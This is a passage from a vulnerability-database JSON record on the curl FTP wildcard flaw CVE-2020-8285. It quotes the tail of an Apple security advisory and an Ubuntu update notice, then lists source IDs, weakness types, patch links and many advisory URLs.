of SecuRing\n\nWindows Server\nAvailable for: macOS Big Sur\nImpact: A malicious application may be able to unexpectedly leak a\nuser\u0027s credentials from secure text fields\nDescription: An API issue in Accessibility TCC permissions was\naddressed with improved state management. \nCVE-2021-1873: an anonymous researcher\n\nInstallation note:\n\nThis update may be obtained from the Mac App Store or\nApple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAmCHO0UACgkQZcsbuWJ6\njjA/XA/7BDDpbLo0btLbUrps6ELmcqFZhpvhuekw8Yd3jVeJihLcJGJpY38ZCcne\nsrCJHuXPzlk3ex0bVkKNRrB04xF0vCA4TEBsJ495754PAKWrxmlx0Ce8zg4h+ey/\ncMTaUgfB1sgOFO8kJCKJurCjhyQ3Xj5c5xa8/zxlKoAgI36PmhZsCoXC6KD+5mqn\nQCRF0kE/y0QSfsq13j4grLGMXLS4pkAJRMWvDiEliYDTw3pOul7ZDOwxLEyucVTv\nfE60H7ff7jfPbDcQ4yEgEbla40+YZYwl9Sv4zxIU2OBPva6HLbA+PXxk4F1QX7eA\nECrfycMSIbQKZ2phryENZCcrX5DN4M/VcGIHq4ujF2CXBJymSWV0O5k5K0GzZ0Ko\nT2Zr2LOOunvHGrYy0okholNYb0iMA09dvwuDdEGr+vhLZhq1BBbmThhNEnArl7mE\n/fx2bvaS3o8TxGuh7mbeFK9q5Tafxe5Qhwgz9pnAtqBC8z1NgQoetk9pKPNDIsNY\nt3/7Xcix+fs28YOjmxPTpntud0EGSjxXm4g0bDbsU922iV1Z3ncgOvd//IzPXniS\nv4IqR/gPbhg+c2CGoaezD91sE5onLuMmFCogkUyftGHnN0EueKMjI+3fmyG4l4d1\n0C3to6hKJNmTm56RgxwfVVOeVnsPF490s9LUYzO4ZUbaQHIuDfo=\n=9+Ju\n-----END PGP SIGNATURE-----\n\n\n. ==========================================================================\nUbuntu Security Notice USN-4665-2\nDecember 09, 2020\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in curl. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nUSN-4665-1 fixed several vulnerabilities in curl. This update provides\nthe corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. \n\nOriginal advisory details:\n\n Varnavas Papaioannou discovered that curl incorrectly handled FTP PASV\n responses. An attacker could possibly use this issue to trick curl into\n connecting to an arbitrary IP address and be used to perform port scanner\n and other information gathering. (CVE-2020-8284)\n\n It was discovered that curl incorrectly handled FTP wildcard matchins. (CVE-2020-8285)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n  curl                            7.35.0-1ubuntu2.20+esm6\n  libcurl3                        7.35.0-1ubuntu2.20+esm6\n  libcurl3-gnutls                 7.35.0-1ubuntu2.20+esm6\n  libcurl3-nss                    7.35.0-1ubuntu2.20+esm6\n\nUbuntu 12.04 ESM:\n  curl                            7.22.0-3ubuntu4.29\n  libcurl3                        7.22.0-3ubuntu4.29\n  libcurl3-gnutls                 7.22.0-3ubuntu4.29\n  libcurl3-nss                    7.22.0-3ubuntu4.29\n\nIn general, a standard system update will make all the necessary changes",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-8285"
      },
      {
        "db": "VULHUB",
        "id": "VHN-186410"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8285"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "162360"
      },
      {
        "db": "PACKETSTORM",
        "id": "160706"
      },
      {
        "db": "PACKETSTORM",
        "id": "162358"
      },
      {
        "db": "PACKETSTORM",
        "id": "160436"
      }
    ],
    "trust": 1.71
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-186410",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186410"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-8285",
        "trust": 2.5
      },
      {
        "db": "SIEMENS",
        "id": "SSA-389290",
        "trust": 1.7
      },
      {
        "db": "HACKERONE",
        "id": "1045844",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160706",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "162358",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "160436",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "163267",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163496",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "160423",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "163276",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "162629",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2180",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4343",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0319",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4364",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1700",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4534",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1866",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.0634",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2471",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2657",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2365",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1409.2",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.3141",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2711",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.4506",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.4058",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3146",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1841",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.2228",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1114",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021042704",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021071516",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021072050",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021051406",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021062315",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021092220",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021072112",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031104",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021052026",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021062703",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "164192",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-756",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "163197",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "163193",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162360",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "162362",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163257",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-186410",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8285",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163188",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186410"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8285"
      },
      {
        "db": "PACKETSTORM",
        "id": "163188"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "162360"
      },
      {
        "db": "PACKETSTORM",
        "id": "160706"
      },
      {
        "db": "PACKETSTORM",
        "id": "162358"
      },
      {
        "db": "PACKETSTORM",
        "id": "160436"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-756"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8285"
      }
    ]
  },
  "id": "VAR-202012-1278",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186410"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2026-03-09T22:04:04.260000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Debian CVElist Bug Report Logs: curl: CVE-2020-8285: FTP wildcard stack overflow",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=f796e96235f578fd40fb69123bab0e97"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2020-8285 log"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1693",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1693"
      },
      {
        "title": "Debian Security Advisories: DSA-4881-1 curl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a9706a30f62799ecc4d45bdb53c244eb"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=4a9822530e6b610875f83ffc10e02aba"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "myapp-container-jaxrs",
        "trust": 0.1,
        "url": "https://github.com/akiraabe/myapp-container-jaxrs "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-8285"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-674",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-787",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186410"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8285"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://security.gentoo.org/glsa/202012-14"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20210122-0007/"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/kb/ht212325"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/kb/ht212326"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/kb/ht212327"
      },
      {
        "trust": 1.7,
        "url": "https://www.debian.org/security/2021/dsa-4881"
      },
      {
        "trust": 1.7,
        "url": "http://seclists.org/fulldisclosure/2021/apr/51"
      },
      {
        "trust": 1.7,
        "url": "https://curl.se/docs/cve-2020-8285.html"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/curl/curl/issues/6255"
      },
      {
        "trust": 1.7,
        "url": "https://hackerone.com/reports/1045844"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com//security-alerts/cpujul2021.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00029.html"
      },
      {
        "trust": 1.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8285"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4%40%3cissues.bookkeeper.apache.org%3e"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/nzuvsqhn2eshmjxnq2z7t2eelbb5hjxg/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/daehe2s2qlo4ao4meeyl75nb7sah5psl/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b%40%3cissues.bookkeeper.apache.org%3e"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/cve/cve-2020-8285"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/daehe2s2qlo4ao4meeyl75nb7sah5psl/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/nzuvsqhn2eshmjxnq2z7t2eelbb5hjxg/"
      },
      {
        "trust": 0.7,
        "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3cissues.bookkeeper.apache.org%3e"
      },
      {
        "trust": 0.7,
        "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3cissues.bookkeeper.apache.org%3e"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/164192/red-hat-security-advisory-2021-3556-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1866"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0634"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1700"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2657"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/libcurl-denial-of-service-via-ftp-wildcard-34067"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2711"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1841"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021042704"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4343/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.0319/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3146"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-curl-libcurl-vulnerabilites-impacting-aspera-high-speed-transfer-server-aspera-high-speed-transfer-endpoint-aspera-desktop-client-4-0-and-earlier-cve-2020-8284-cve-2020-8286-c/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1409.2"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1114"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2365"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-curl-affect-powersc-cve-2020-8284-cve-2020-8285-and-cve-2020-8286/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2180"
      },
      {
        "trust": 0.6,
        "url": "https://www.oracle.com/security-alerts/cpujul2021.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162629/red-hat-security-advisory-2021-1610-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163276/red-hat-security-advisory-2021-2543-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162358/apple-security-advisory-2021-04-26-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021052026"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160706/gentoo-linux-security-advisory-202012-14.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021072050"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163496/red-hat-security-advisory-2021-2705-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2228"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021062703"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021092220"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4534/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4364/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021072112"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160436/ubuntu-security-notice-usn-4665-2.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6520474"
      },
      {
        "trust": 0.6,
        "url": "https://support.apple.com/en-us/ht212327"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.4506/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/163267/red-hat-security-advisory-2021-2532-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.2471"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021071516"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021062315"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.4058"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/160423/ubuntu-security-notice-usn-4665-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-qradar-analyst-workflow-add-on-to-ibm-qradar-siem-is-vulnerable-to-using-components-with-known-vulnerabilities/"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021051406"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.3141"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031104"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8286"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8284"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-8286"
      },
      {
        "trust": 0.3,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2020-8284"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22901"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22901"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22890"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22890"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8169"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31618"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31618"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-8169"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1813"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1840"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1739"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1828"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1809"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-8037"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1784"
      },
      {
        "trust": 0.2,
        "url": "https://support.apple.com/downloads/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1843"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1810"
      },
      {
        "trust": 0.2,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1811"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1839"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1824"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1834"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1740"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-15358"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21639"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12364"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28165"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28092"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13434"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13776"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25037"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3842"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-13776"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24977"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12363"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-8231"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27219"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-10878"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29362"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-28935"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28163"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2017-14502"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25034"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25035"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-9169"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26116"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-26137"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21309"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21640"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-29361"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-28918"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-24330"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3501"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25042"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-12362"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25648"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-25032"
      },
      {
        "trust": 0.1,
